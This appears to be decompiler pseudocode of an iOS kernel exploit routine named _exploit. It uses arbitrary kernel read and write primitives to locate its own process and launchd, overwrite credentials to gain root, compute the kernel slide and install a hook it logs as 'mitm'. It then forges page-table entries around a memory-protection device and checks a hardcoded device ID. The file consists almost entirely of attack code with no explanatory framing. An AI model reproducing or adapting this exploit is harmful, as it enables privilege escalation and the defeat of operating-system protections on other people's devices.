1. int _exploit(int arg0, int arg1, int arg2, int arg3) {
2.     *(r31 + 0xffffffffffffffe0) = r28;
3.     *(r31 + 0xffffffffffffffe8) = r27;
4.     *(r31 + 0xfffffffffffffff0) = r29;
5.     *(r31 + 0xfffffffffffffff8) = r30;
6.     r29 = r31 + 0xfffffffffffffff0;
7.     r31 = r31 + 0xffffffffffffffe0 - 0x2;
8.     *(r29 + 0xffffffffffffffe8) = *___stack_chk_guard;
9.     *(r31 + 0x1948) = arg0;
10.     *(r31 + 0x1944) = arg1;
11.     *(r31 + 0x1938) = arg2;
12.     *(r31 + 0x1930) = arg3;
13.     *(r31 + 0x192c) = r4;
14.     *(r31 + 0x1928) = r5;
15.     *(r31 + 0x1924) = r31;
16.     *(r31 + 0x11c0) = *___stack_chk_guard;
17.     while (*(r31 + 0x1924) < 0x100) {
18.             sync();
19.             *(r31 + 0x1924) = *(r31 + 0x1924) + 0x1;
20.     }
21.     _ReadAnywhere64();
22.     NSLog(@"read test: %llx", r1);
23.     if (0x10001e1b0 != 0x0) goto loc_10000f958;
24.  
25. loc_10000f900:
26.     *(r31 + 0x18f8) = stack[2049];
27.     *(r31 + 0x1900) = r31 | 0xffffffffc0000000;
28.     *(r31 + 0x1904) = r31;
29.     *(r31 + 0x1908) = 0x100016bc0;
30.     *(r31 + 0x1910) = 0x10001c610;
31.     *(r31 + 0x1918) = *(r31 + 0x1948);
32.     r0 = dispatch_async(*__dispatch_main_q, r31 + 0x8f9);
33.     goto loc_100016b8c;
34.  
35. loc_100016b8c:
36.     if (*___stack_chk_guard == *(r29 + 0xffffffffffffffe8)) {
37.             r31 = r29 - 0x10;
38.     }
39.     else {
40.             r0 = __stack_chk_fail();
41.     }
42.     return r0;
43.  
44. loc_10000f958:
45.     *(r31 + 0x18d0) = stack[2049];
46.     *(r31 + 0x18d8) = r31 | 0xffffffffc0000000;
47.     *(r31 + 0x18dc) = r31;
48.     *(r31 + 0x18e0) = 0x100016c08;
49.     *(r31 + 0x18e8) = 0x10001c630;
50.     *(r31 + 0x18f0) = *(r31 + 0x1948);
51.     dispatch_async(*__dispatch_main_q, r31 + 0x8d1);
52.     *(r31 + 0x18c8) = r31;
53.     *(r31 + 0x18c0) = r31;
54.     *(r31 + 0x18b8) = _ReadAnywhere64();
55.     r9 = *(r31 + 0x18b8);
56.     NSLog(@"found procs at %llx", r1);
57.     while (*(r31 + 0x18b8) != 0x0) {
58.             *(r31 + 0x18b4) = _ReadAnywhere32();
59.             *(r31 + 0x11bc) = *(r31 + 0x18b4);
60.             r0 = getpid();
61.             r9 = *(r31 + 0x11bc);
62.             if (r9 == r0) {
63.                     *(r31 + 0x18c8) = *(r31 + 0x18b8);
64.             }
65.             else {
66.                     if (*(r31 + 0x18b4) == 0x1) {
67.                             *(r31 + 0x18c0) = *(r31 + 0x18b8);
68.                     }
69.             }
70.             if ((*(r31 + 0x18c0) != 0x0) && (*(r31 + 0x18c8) != 0x0)) {
71.                 break;
72.             }
73.             *(r31 + 0x18b8) = _ReadAnywhere64();
74.     }
75.     *(r31 + 0x18a8) = _ReadAnywhere64();
76.     *(r31 + 0x18a0) = r31;
77.     *(r31 + 0x1898) = *(r31 + 0x18c8);
78.     goto loc_10000fa74;
79.  
80. loc_10000fa74:
81.     if (*(r31 + 0x1898) == 0x0) goto loc_10000fb04;
82.  
83. loc_10000fa7c:
84.     *(r31 + 0x1894) = _ReadAnywhere32();
85.     r0 = _ReadAnywhere32();
86.     asm { movn       w9, #0xb00 };
87.     r10 = zero_extend_64(0x400);
88.     asm { movk       w10, #0xc };
89.     *(r31 + 0x1890) = r0;
90.     *(r31 + 0x1890) = *(r31 + 0x1890) | r10;
91.     *(r31 + 0x1890) = *(r31 + 0x1890) & r9;
92.     r0 = *(r31 + 0x1898) + 0x2a8;
93.     r0 = _WriteAnywhere32(r0, *(r31 + 0x1890));
94.     r9 = *(r31 + 0x1894);
95.     *(r31 + 0x11b0) = r0;
96.     if (r9 != 0x1) goto loc_10000faf4;
97.  
98. loc_10000fae0:
99.     *(r31 + 0x18a0) = _ReadAnywhere64();
100.     goto loc_10000fb04;
101.  
102. loc_10000fb04:
103.     *(r31 + 0x1888) = *(r31 + 0x18a8);
104.     r1 = *(r31 + 0x18a0);
105.     *(r31 + 0x11a8) = _WriteAnywhere64();
106.     getuid();
107.     NSLog(@"got uid = %x", r1);
108.     r0 = _ReadAnywhere64();
109.     *(r31 + 0x1880) = _ReadAnywhere64();
110.     *(r31 + 0x1878) = _ReadAnywhere64();
111.     r8 = (r31 | 0x18) * (0x10001e1c0 >> 0x8);
112.     asm { ubfx       x8, x8, #0x0, #0x20 };
113.     *(r31 + 0x1878) = *(r31 + 0x1878) + r8;
114.     *(r31 + 0x1870) = _ReadAnywhere64();
115.     *(r31 + 0x186c) = r31;
116.     *(r31 + 0x1860) = r31;
117.     r0 = _ReadAnywhere32();
118.     r9 = zero_extend_64(0x8000);
119.     asm { movk       w9, #0x1d };
120.     *(r31 + 0x186c) = r0;
121.     *(r31 + 0x186c) = *(r31 + 0x186c) & 0xffffffff80000fff;
122.     if (*(r31 + 0x186c) == r9) {
123.             asm { cset       w9 };
124.     }
125.     r8 = (r9 ^ 0x1) & 0x1;
126.     asm { sxtw       x8, w8 };
127.     if (r8 == 0x0) goto loc_10000fc08;
128.  
129. loc_10000fbe4:
130.     r0 = __assert_rtn();
131.     return r0;
132.  
133. loc_10000fc08:
134.     *(r31 + 0x1860) = _ReadAnywhere64();
135.     r0 = _constload();
136.     if (r0 == 0x0) {
137.             asm { cset       w0 };
138.     }
139.     r8 = (r0 ^ 0x1) & 0x1;
140.     asm { sxtw       x8, w8 };
141.     if (r8 == 0x0) goto loc_10000fc5c;
142.  
143. loc_10000fc38:
144.     r0 = __assert_rtn();
145.     return r0;
146.  
147. loc_10000fc5c:
148.     _ReadAnywhere64();
149.     r0 = _affine_const_by_surfacevt();
150.     r0 = sign_extend_64(r0);
151.     if (r0 == 0x0) {
152.             asm { cset       w0 };
153.     }
154.     r30 = (r0 ^ 0x1) & 0x1;
155.     asm { sxtw       x30, w30 };
156.     if (r30 == 0x0) goto loc_10000fcac;
157.  
158. loc_10000fc88:
159.     r0 = __assert_rtn();
160.     return r0;
161.  
162. loc_10000fcac:
163.     if (_constget() != 0x0) {
164.             asm { cset       w8 };
165.     }
166.     r0 = (r8 ^ 0x1) & 0x1;
167.     asm { sxtw       x0, w0 };
168.     if (r0 == 0x0) goto loc_10000fcf4;
169.  
170. loc_10000fcd0:
171.     r0 = __assert_rtn();
172.     return r0;
173.  
174. loc_10000fcf4:
175.     *(r31 + 0x11a0) = _ReadAnywhere64();
176.     *(r31 + 0x11a0) - _constget();
177.     NSLog(@"slide: %llx", r1);
178.     *(r31 + 0x1858) = r31;
179.     *(r31 + 0x119c) = vm_allocate(*_mach_task_self_, r31 + 0x859, r31 | 0x4000, r31 | 0x1);
180.     *(r31 + 0x1190) = *(r31 + 0x1858);
181.     *(r31 + 0x1188) = _ReadAnywhere64();
182.     _copyin();
183.     r1 = r31 + 0x851;
184.     r2 = r31 | 0x4000;
185.     *(r31 + 0x1850) = r31;
186.     *(r31 + 0x184c) = r31;
187.     *(r31 + 0x1180) = r31 + 0x84d;
188.     *(r31 + 0x117c) = r31 | 0x2;
189.     r9 = *(r31 + 0x1180);
190.     r31 = r9;
191.     *(r31 + 0x8) = r9;
192.     *(r31 + 0x10) = *(r31 + 0x117c);
193.     *(r31 + 0x1178) = vm_remap(0x10001e1b0, r1, r2, zero_extend_64(0x0), stack[2048], stack[2049], stack[2050], stack[2051], stack[2052], stack[2053], stack[2054]);
194.     *(*(r31 + 0x1858) + 0x5b8) = _constget() + 0x10001e1b8;
195.     *(*(r31 + 0x1858) + 0x1008) = _constget() + 0x10001e1b8;
196.     *(*(r31 + 0x1858) + 0x1000) = *(r31 + 0x1850);
197.     r0 = _WriteAnywhere64();
198.     r1 = *(r31 + 0x1850);
199.     *(r31 + 0x1170) = r0;
200.     r0 = _WriteAnywhere64();
201.     *(r31 + 0x1848) = r31;
202.     *(r31 + 0x1168) = r0;
203.     while (*(r31 + 0x1848) < 0x10001dde8) {
204.             if (0x10001e0e0 + sign_extend_64(*(r31 + 0x1848)) * (r31 | 0x4) != 0x0) {
205.                     r0 = _ReadAnywhere64();
206.                     *(r31 + 0x1840) = _ReadAnywhere64();
207.                     r8 = zero_extend_64(0x0);
208.                     *(r31 + 0x1838) = _ReadAnywhere64();
209.                     r10 = (r31 | 0x18) * (0x10001e0e0 + sign_extend_64(*(r31 + 0x1848)) * (r31 | 0x4) >> 0x8);
210.                     asm { ubfx       x10, x10, #0x0, #0x20 };
211.                     *(r31 + 0x1838) = *(r31 + 0x1838) + r10;
212.                     r0 = _WriteAnywhere64();
213.                     r10 = *(r31 + 0x1838) + 0x8;
214.                     *(r31 + 0x1160) = r0;
215.                     r0 = _WriteAnywhere64();
216.                     r10 = *(r31 + 0x1838) + 0x10;
217.                     *(r31 + 0x1158) = r0;
218.                     r1 = zero_extend_64(0x0);
219.                     *(r31 + 0x1150) = _WriteAnywhere64();
220.             }
221.             *(r31 + 0x1848) = *(r31 + 0x1848) + 0x1;
222.     }
223.     *(r31 + 0x1834) = _lookup();
224.     *(r31 + 0x10) = *(r31 + 0x1928);
225.     *(r31 + 0x8) = *(r31 + 0x192c);
226.     NSLog(@"%x %x %x", r1, r2, r3);
227.     r0 = _ReadAnywhere64();
228.     *(r31 + 0x1828) = _ReadAnywhere64();
229.     r9 = r31 | 0x18;
230.     *(r31 + 0x1820) = _ReadAnywhere64();
231.     r8 = r9 * (*(r31 + 0x1928) >> 0x8);
232.     asm { ubfx       x8, x8, #0x0, #0x20 };
233.     *(r31 + 0x1818) = r8 + *(r31 + 0x1820);
234.     r8 = r9 * (*(r31 + 0x192c) >> 0x8);
235.     asm { ubfx       x8, x8, #0x0, #0x20 };
236.     *(r31 + 0x1810) = r8 + *(r31 + 0x1820);
237.     r0 = _ReadAnywhere64();
238.     *(r31 + 0x1808) = _ReadAnywhere64();
239.     *(r31 + 0x1800) = _ReadAnywhere64();
240.     do {
241.             *(r31 + 0x1148) = _ReadAnywhere64();
242.             if (*(r31 + 0x1148) == _ReadAnywhere64()) {
243.                 break;
244.             }
245.             *(r31 + 0x1800) = *(r31 + 0x1800) + 0x18;
246.     } while (true);
247.     NSLog(@"found mitm at %llx", r1);
248.     *(r31 + 0x1140) = *(r31 + 0x1800);
249.     *(r31 + 0x1138) = _ReadAnywhere64();
250.     *(r31 + 0x1130) = _WriteAnywhere64();
251.     *(r31 + 0x1834) = _lookup();
252.     *(r31 + 0x10) = *(r31 + 0x1928);
253.     *(r31 + 0x8) = *(r31 + 0x192c);
254.     NSLog(@"%x %x %x", *(r31 + 0x1138), r2, r3);
255.     r0 = _WriteAnywhere64();
256.     r1 = *(r31 + 0x1810) + 0x8;
257.     *(r31 + 0x1128) = r0;
258.     r0 = _WriteAnywhere64();
259.     r1 = *(r31 + 0x1810) + 0x10;
260.     *(r31 + 0x1120) = r0;
261.     *(r31 + 0x1118) = _WriteAnywhere64();
262.     r0 = _WriteAnywhere64();
263.     r1 = *(r31 + 0x1818) + 0x8;
264.     *(r31 + 0x1110) = r0;
265.     r0 = _WriteAnywhere64();
266.     r1 = *(r31 + 0x1818) + 0x10;
267.     *(r31 + 0x1108) = r0;
268.     r1 = zero_extend_64(0x0);
269.     *(r31 + 0x1100) = _WriteAnywhere64();
270.     *(r31 + 0x1834) = _lookup();
271.     r8 = (r31 | 0x18) * (*(r31 + 0x1834) >> 0x8);
272.     asm { ubfx       x8, x8, #0x0, #0x20 };
273.     *(r31 + 0x17f8) = r8 + *(r31 + 0x1820);
274.     *(r31 + 0x10) = *(r31 + 0x1928);
275.     *(r31 + 0x8) = *(r31 + 0x192c);
276.     NSLog(@"%x %x %x", r1, r2, r3);
277.     r0 = _WriteAnywhere64();
278.     r1 = *(r31 + 0x17f8) + 0x8;
279.     *(r31 + 0x10f8) = r0;
280.     r0 = _WriteAnywhere64();
281.     r1 = *(r31 + 0x17f8) + 0x10;
282.     *(r31 + 0x10f0) = r0;
283.     r1 = zero_extend_64(0x0);
284.     *(r31 + 0x10e8) = _WriteAnywhere64();
285.     *(r31 + 0x17f0) = dlopen("/usr/lib/libMobileGestalt.dylib", zero_extend_64(0x9));
286.     *(r31 + 0x17e8) = dlsym(*(r31 + 0x17f0), "MGCopyAnswer");
287.     *(r31 + 0x10e0) = *(r31 + 0x17e8);
288.     *(r31 + 0x17e0) = (*(r31 + 0x10e0))(@"UniqueDeviceID");
289.     r2 = @"5610f60b6dbe1bc6c3aa90c86fd5df13f0aa3b06";
290.     [*(r31 + 0x17e0) isEqualToString:r2];
291.     if (!CPU_FLAGS & E) {
292.             asm { movk       x0, #0x1337 };
293.             asm { movk       x0, #0x1337 };
294.             asm { movk       x0, #0x1337 };
295.             r1 = zero_extend_64(0x4141);
296.             asm { movk       x1, #0x4141 };
297.             asm { movk       x1, #0x4141 };
298.             asm { movk       x1, #0x4141 };
299.             *(r31 + 0x10d8) = _WriteAnywhere64();
300.     }
301.     *(r31 + 0x17d8) = _constget() + 0x10001e1b8;
302.     _ReadAnywhere64();
303.     _ReadAnywhere64();
304.     r0 = _constget();
305.     _ReadAnywhere64();
306.     _ReadAnywhere64();
307.     *(r31 + 0x17d0) = r31;
308.     *(r31 + 0x17c8) = r31;
309.     *(r31 + 0x8) = 0x10001e1d8;
310.     NSLog(@"phys: 0x%llx, virt: 0x%llx", r1, r2);
311.     _checkvad();
312.     *(r31 + 0x17c0) = r31;
313.     *(r31 + 0x17b8) = r31;
314.     *(r31 + 0x17b0) = _physalloc();
315.     *(r31 + 0x17af) = r31;
316.     if (_constget() == 0x0) goto loc_1000120f4;
317.  
318. loc_1000103e8:
319.     NSLog(@"found memprot device");
320.     *(r31 + 0x17a0) = r31;
321.     if (_constget() != 0x0) {
322.             *(r31 + 0x17a0) = _constget() + 0x10001e1b8;
323.     }
324.     else {
325.             r0 = _constget();
326.             *(r31 + 0x17a0) = (_ReadAnywhere64() - 0x10001e1d0) + 0x10001e1d8;
327.     }
328.     *(r31 + 0x1798) = _physalloc();
329.     *(r31 + 0x1790) = _physalloc();
330.     *(r31 + 0x1788) = _physalloc();
331.     *(r31 + 0x1780) = _constget() & 0x3fff;
332.     *(r31 + 0x10d0) = _constget() & 0xffffffffffffc000;
333.     *(r31 + 0x1778) = *(r31 + 0x10d0) - (_constget() & 0xffffffffffffc000);
334.     NSLog(@"reloff %llx", r1);
335.     *(r31 + 0x1770) = _constget() & 0x3fff;
336.     *(r31 + 0x1768) = *(r31 + 0x1798) + *(r31 + 0x1770);
337.     *(r31 + 0x1770) = _constget() & 0x3fff;
338.     r0 = _WriteAnywhere64();
339.     r1 = *(r31 + 0x1798) + *(r31 + 0x1770);
340.     *(r31 + 0x10c8) = r0;
341.     *(r31 + 0x10c0) = r1;
342.     _constget() + 0x10001e1b8;
343.     *(r31 + 0x10b8) = _WriteAnywhere64();
344.     NSLog(@"here");
345.     r0 = sleep(r31 | 0x1);
346.     *(r31 + 0x1764) = r31;
347.     *(r31 + 0x10b4) = r0;
348.     while (*(r31 + 0x1764) < 0x20) {
349.             r8 = zero_extend_64(0x120);
350.             r9 = *(r31 + 0x1790);
351.             r11 = *(r31 + 0x1764) << 0x3;
352.             asm { sxtw       x11, w11 };
353.             r9 = *(r31 + 0x1788);
354.             r11 = *(r31 + 0x1764) * r8;
355.             asm { sxtw       x11, w11 };
356.             r0 = _WriteAnywhere64();
357.             r8 = zero_extend_64(0x13);
358.             r9 = *(r31 + 0x1788);
359.             r11 = *(r31 + 0x1764) * zero_extend_64(0x120);
360.             asm { sxtw       x11, w11 };
361.             *(r31 + 0x10a8) = r0;
362.             *(r31 + 0x10a0) = 0xc8 + r9 + r11;
363.             _constget() + 0x10001e1b8;
364.             r0 = _WriteAnywhere64();
365.             r8 = zero_extend_64(0x14);
366.             r9 = *(r31 + 0x1788);
367.             r11 = *(r31 + 0x1764) * zero_extend_64(0x120);
368.             asm { sxtw       x11, w11 };
369.             *(r31 + 0x1098) = r0;
370.             *(r31 + 0x1090) = 0x110 + r9 + r11;
371.             _constget() + 0x10001e1c0;
372.             r0 = _WriteAnywhere64();
373.             r8 = zero_extend_64(0x12);
374.             r9 = *(r31 + 0x1788);
375.             r11 = *(r31 + 0x1764) * zero_extend_64(0x120);
376.             asm { sxtw       x11, w11 };
377.             *(r31 + 0x1088) = r0;
378.             *(r31 + 0x1080) = 0xa0 + r9 + r11;
379.             _constget() + 0x10001e1b8;
380.             r0 = _WriteAnywhere64();
381.             r9 = *(r31 + 0x1788);
382.             r11 = *(r31 + 0x1764) * zero_extend_64(0x120);
383.             asm { sxtw       x11, w11 };
384.             r9 = 0x30 + r9 + r11;
385.             r11 = *(r31 + 0x1790);
386.             r1 = *(r31 + 0x1764) + 0x1 << 0x3;
387.             asm { sxtw       x1, w1 };
388.             *(r31 + 0x1078) = r0;
389.             *(r31 + 0x1070) = _WriteAnywhere64();
390.             *(r31 + 0x1764) = *(r31 + 0x1764) + 0x1;
391.     }
392.     *(r31 + 0x1758) = _physalloc();
393.     *(r31 + 0x1758) = *(r31 + 0x1758) + 0x44;
394.     r0 = *(r31 + 0x1788) + zero_extend_64(0x22e0);
395.     *(r31 + 0x1068) = _WriteAnywhere64();
396.     *(r31 + 0x1060) = _WriteAnywhere64();
397.     *(r31 + 0x1750) = _physalloc();
398.     *(r31 + 0x1748) = _physalloc();
399.     *(r31 + 0x1058) = *(r31 + 0x1758) + 0xc8;
400.     _constget() + 0x10001e1b8;
401.     r0 = _WriteAnywhere64();
402.     r1 = *(r31 + 0x1758) + 0x28;
403.     *(r31 + 0x1050) = r0;
404.     *(r31 + 0x1048) = r1;
405.     _constget() + 0x10001e1b8;
406.     r0 = _WriteAnywhere64();
407.     r1 = *(r31 + 0x1758) + 0x20;
408.     r30 = *(r31 + 0x1758) + 0x100;
409.     *(r31 + 0x1040) = r0;
410.     r0 = _WriteAnywhere64();
411.     r1 = *(r31 + 0x1758) + 0x100;
412.     r30 = *(r31 + 0x1758) + 0x100;
413.     *(r31 + 0x1038) = r0;
414.     r0 = _WriteAnywhere64();
415.     r1 = *(r31 + 0x1758) + 0x30;
416.     r30 = *(r31 + 0x1750) + 0x8;
417.     *(r31 + 0x1030) = r0;
418.     r0 = _WriteAnywhere64();
419.     r30 = *(r31 + 0x1758) + 0x10;
420.     *(r31 + 0x1028) = r0;
421.     r0 = _WriteAnywhere64();
422.     asm { movk       x1, #0x4141 };
423.     r30 = *(r31 + 0x1758) + 0x18;
424.     *(r31 + 0x1020) = r0;
425.     r0 = _WriteAnywhere64();
426.     r1 = *(r31 + 0x1758) + 0x100;
427.     *(r31 + 0x1018) = r0;
428.     *(r31 + 0x1010) = r1 + 0x78;
429.     _constget() + 0x10001e1b8;
430.     r0 = _WriteAnywhere64();
431.     r1 = *(r31 + 0x1758) + 0x110;
432.     *(r31 + 0x1008) = r0;
433.     *(r31 + 0x1000) = r1;
434.     _constget() + 0x10001e1bc;
435.     r0 = _WriteAnywhere64();
436.     *(r31 + 0x1744) = r31;
437.     *(r31 + 0xff8) = r0;
438.     while (*(r31 + 0x1744) < 0x800) {
439.             r8 = *(r31 + 0x1750);
440.             r10 = *(r31 + 0x1744) << 0x3;
441.             asm { sxtw       x10, w10 };
442.             *(r31 + 0xff0) = r8 + r10;
443.             _constget() + 0x10001e1b8;
444.             *(r31 + 0xfe8) = _WriteAnywhere64();
445.             *(r31 + 0x1744) = *(r31 + 0x1744) + 0x1;
446.     }
447.     asm { movk       x1, #0x4141 };
448.     asm { movk       x1, #0x4141 };
449.     r0 = _WriteAnywhere64();
450.     *(r31 + 0x1738) = r31;
451.     *(r31 + 0xfe0) = r0;
452.     r0 = _WriteAnywhere64();
453.     r8 = *(r31 + 0x1748) + 0x8;
454.     *(r31 + 0xfd8) = r0;
455.     *(r31 + 0xfd0) = r8;
456.     _constget() + 0x10001e1b8;
457.     r0 = _WriteAnywhere64();
458.     r8 = *(r31 + 0x1748) + 0x100;
459.     *(r31 + 0xfc8) = r0;
460.     *(r31 + 0xfc0) = r8 + 0xa0;
461.     _constget() + 0x10001e1b8;
462.     r0 = _WriteAnywhere64();
463.     r8 = *(r31 + 0x1748) + 0x100;
464.     *(r31 + 0xfb8) = r0;
465.     r0 = _WriteAnywhere64();
466.     r1 = *(r31 + 0x1748) + 0x100;
467.     *(r31 + 0xfb0) = r0;
468.     r0 = _WriteAnywhere64();
469.     r8 = *(r31 + 0x1748) + 0x100;
470.     *(r31 + 0xfa8) = r0;
471.     *(r31 + 0xfa0) = r8 + 0x10;
472.     _constget() + 0x10001e1b8;
473.     r0 = _WriteAnywhere64();
474.     r1 = *(r31 + 0x1748) + 0x100;
475.     *(r31 + 0xf98) = r0;
476.     r0 = _WriteAnywhere64();
477.     r8 = *(r31 + 0x1748) + 0x100;
478.     *(r31 + 0xf90) = r0;
479.     *(r31 + 0xf88) = r8 + 0x28;
480.     _constget() + 0x10001e1b8;
481.     r0 = _WriteAnywhere64();
482.     r8 = *(r31 + 0x17a0) + 0x20;
483.     *(r31 + 0xf80) = r0;
484.     *(r31 + 0x1730) = (_ReadAnywhere64() - 0x10001e1d0) + 0x10001e1d8;
485.     *(r31 + 0x1728) = _ReadAnywhere64();
486.     *(r31 + 0x1720) = ((*(r31 + 0x1728) & 0xfffffffffffff000) - 0x10001e1d0) + 0x10001e1d8;
487.     *(r31 + 0x1718) = r31;
488.     for (*(r31 + 0x1714) = r31; *(r31 + 0x1714) < 0x800; *(r31 + 0x1714) = *(r31 + 0x1714) + 0x1) {
489.             r8 = *(r31 + 0x1720);
490.             r10 = *(r31 + 0x1714) << 0x3;
491.             asm { sxtw       x10, w10 };
492.             *(r31 + 0x1718) = _ReadAnywhere64();
493.             if (*(r31 + 0x1718) != 0x0) {
494.                 break;
495.             }
496.     }
497.     *(r31 + 0x1708) = 0x10001e1e8;
498.     *(r31 + 0x1700) = ((*(r31 + 0x1718) & 0xfffffffffffff000) - 0x10001e1d0) + 0x10001e1d8;
499.     *(r31 + 0x16f8) = r31;
500.     *(r31 + 0x16f0) = r31;
501.     for (*(r31 + 0x16ec) = r31; *(r31 + 0x16ec) < 0x800; *(r31 + 0x16ec) = *(r31 + 0x16ec) + 0x1) {
502.             r8 = *(r31 + 0x1700);
503.             r10 = *(r31 + 0x16ec) << 0x3;
504.             asm { sxtw       x10, w10 };
505.             *(r31 + 0x16f8) = _ReadAnywhere64();
506.             r8 = *(r31 + 0x16ec) << 0x3;
507.             asm { sxtw       x8, w8 };
508.             *(r31 + 0x16f0) = r8;
509.             if (*(r31 + 0x16f8) != 0x0) {
510.                 break;
511.             }
512.     }
513.     *(r31 + 0x16e0) = *(r31 + 0x16f8);
514.     *(r31 + 0xf78) = *(r31 + 0x16e0) & 0xfff;
515.     *(r31 + 0x16e0) = *(r31 + 0xf78) | ((_constget() & 0xffffffffffffc000) + 0x10001e1b8 - 0x10001e1d8) + 0x10001e1d0 & 0xfffffffffffff000;
516.     r0 = _WriteAnywhere64();
517.     r8 = *(r31 + 0x16e0) & 0xfff;
518.     *(r31 + 0xf70) = r0;
519.     *(r31 + 0xf68) = r8;
520.     *(r31 + 0x16e0) = *(r31 + 0xf68) | ((_constget() & 0xffffffffffffc000) + 0x10001e1b8 - 0x10001e1d8) + 0x10001e1d4 & 0xfffffffffffff000;
521.     r0 = _WriteAnywhere64();
522.     r8 = *(r31 + 0x16e0) & 0xfff;
523.     *(r31 + 0xf60) = r0;
524.     *(r31 + 0xf58) = r8;
525.     *(r31 + 0x16e0) = *(r31 + 0xf58) | (_constget() + 0x10001e1b8 - 0x10001e1d8) + 0x10001e1d0 & 0xfffffffffffff000;
526.     r0 = _WriteAnywhere64();
527.     r8 = *(r31 + 0x16e0) & 0xfff;
528.     *(r31 + 0xf50) = r0;
529.     *(r31 + 0xf48) = r8;
530.     *(r31 + 0x16e0) = *(r31 + 0xf48) | _findphys_real() & 0xfffffffffffff000;
531.     r0 = _WriteAnywhere64();
532.     r8 = *(r31 + 0x16e0) & 0xfff;
533.     *(r31 + 0xf40) = r0;
534.     *(r31 + 0xf38) = r8;
535.     *(r31 + 0x16e0) = *(r31 + 0xf38) | _findphys_real() + 0x4 & 0xfffffffffffff000;
536.     r0 = _WriteAnywhere64();
537.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
538.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
539.     *(r31 + 0xf30) = r0;
540.     r0 = _WriteAnywhere64();
541.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
542.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
543.     *(r31 + 0xf28) = r0;
544.     *(r31 + 0xf20) = r8;
545.     _constget() + 0x10001e1b8;
546.     r0 = _WriteAnywhere64();
547.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
548.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
549.     *(r31 + 0xf18) = r0;
550.     r0 = _WriteAnywhere64();
551.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
552.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
553.     *(r31 + 0xf10) = r0;
554.     r0 = _WriteAnywhere64();
555.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
556.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
557.     *(r31 + 0xf08) = r0;
558.     r0 = _WriteAnywhere64();
559.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
560.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
561.     *(r31 + 0xf00) = r0;
562.     *(r31 + 0xef8) = r8;
563.     _constget() + 0x10001e1b8;
564.     r0 = _WriteAnywhere64();
565.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
566.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
567.     *(r31 + 0xef0) = r0;
568.     r0 = _WriteAnywhere64();
569.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
570.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
571.     *(r31 + 0xee8) = r0;
572.     r0 = _WriteAnywhere64();
573.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
574.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
575.     *(r31 + 0xee0) = r0;
576.     r0 = _WriteAnywhere64();
577.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
578.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
579.     *(r31 + 0xed8) = r0;
580.     *(r31 + 0xed0) = r8;
581.     _constget() + 0x10001e1c0;
582.     r0 = _WriteAnywhere64();
583.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
584.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
585.     *(r31 + 0xec8) = r0;
586.     r0 = _WriteAnywhere64();
587.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
588.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
589.     *(r31 + 0xec0) = r0;
590.     *(r31 + 0xeb8) = r8;
591.     _constget() + 0x10001e1b8;
592.     r0 = _WriteAnywhere64();
593.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
594.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
595.     *(r31 + 0xeb0) = r0;
596.     r0 = _WriteAnywhere64();
597.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
598.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
599.     *(r31 + 0xea8) = r0;
600.     *(r31 + 0xea0) = r8;
601.     _constget() + 0x10001e1b8;
602.     r0 = _WriteAnywhere64();
603.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
604.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
605.     *(r31 + 0xe98) = r0;
606.     *(r31 + 0xe90) = r8;
607.     _constget() + 0x10001e228;
608.     r0 = _WriteAnywhere64();
609.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
610.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
611.     *(r31 + 0xe88) = r0;
612.     *(r31 + 0xe80) = r8;
613.     _constget() + 0x10001e1b8;
614.     r0 = _WriteAnywhere64();
615.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
616.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
617.     *(r31 + 0xe78) = r0;
618.     r0 = _WriteAnywhere64();
619.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
620.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
621.     *(r31 + 0xe70) = r0;
622.     *(r31 + 0xe68) = r8;
623.     _constget() + 0x10001e1b8;
624.     r0 = _WriteAnywhere64();
625.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
626.     r9 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
627.     *(r31 + 0xe60) = r0;
628.     r0 = _WriteAnywhere64();
629.     *(r31 + 0x1738) = *(r31 + 0x1738) + 0x1;
630.     r8 = *(r31 + 0x1750) + *(r31 + 0x1738) * 0x8;
631.     *(r31 + 0xe58) = r0;
632.     *(r31 + 0xe50) = r8;
633.     _constget() + 0x10001e1b8;
634.     *(r31 + 0xe48) = _WriteAnywhere64();
635.     *(r31 + 0x16d8) = _physalloc();
